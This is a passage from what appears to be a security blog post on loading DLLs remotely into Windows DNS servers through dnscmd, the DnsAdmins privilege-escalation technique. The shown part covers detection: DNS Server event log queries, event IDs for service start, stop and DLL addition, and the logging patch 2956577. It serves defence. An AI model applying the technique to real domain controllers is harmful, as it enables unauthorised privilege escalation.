0x1\u003Cbr>    PreviousLocalHostname    REG_SZ    WIN-F08C969D7FM.test.com\u003Cbr>    BootMethod    REG_DWORD    0x3\u003Cbr>    AdminConfigured    REG_DWORD    0x1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. View logs\u003C\u002Fh3>\u003Ch4>(1) Record DNS service startup and shutdown\u003C\u002Fh4>\u003Cp>Location: Application and Services Logs-&gt;DNS Server\u003C\u002Fp>\u003Cp>Command line view:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wevtutil qe \"dns server\" \u002Frd:true \u002Ff:text\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>ID 2 indicates DNS service startup, ID 4 indicates DNS service shutdown\u003C\u002Fp>\u003Ch4>(2) Record DLL addition operations\u003C\u002Fh4>\u003Cp>Requires enhanced DNS logging and diagnostic features, supported by default in Server 2016, Server 2012 requires patch 2956577 installation\u003C\u002Fp>\u003Cp>Reference documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fprevious-versions\u002Fwindows\u002Fit-pro\u002Fwindows-server-2012-R2-and-2012\u002Fdn800669(v=ws.11)\u003C\u002Fp>\u003Cp>Patch notes:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fsupport.microsoft.com\u002Fen-us\u002Fhelp\u002F2956577\u002Fupdate-adds-query-logging-and-change-auditing-to-windows-dns-servers\u003C\u002Fp>\u003Cp>Patch download:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.catalog.update.microsoft.com\u002FSearch.aspx?q=2956577\u003C\u002Fp>\u003Cp>Adding a DLL operation generates a log with ID 541.\u003C\u002Fp>\u003Ch2>0x04 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the method of remotely loading DLLs on DNS servers using dnscmd, combining exploitation ideas to provide defense recommendations.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1762,"Onedaysec",4,"published","2026-02-02T08:20:05.028Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Remote DLL Loading on DNS Server via dnscmd for Domain Penetration","domain penetration, DNS server, dnscmd, DLL loading, DnsAdmins, privilege escalation, Windows security, exploitation technique, defense strategies",null,false,[],{"docs":43,"hasNextPage":40},[44,45,4,46],58,57,55,{"title":39,"description":39,"image":39},"2026-07-24T15:37:15.757Z","2026-07-23T16:00:56.839Z","draft","2026-07-23T16:03:15.500Z"]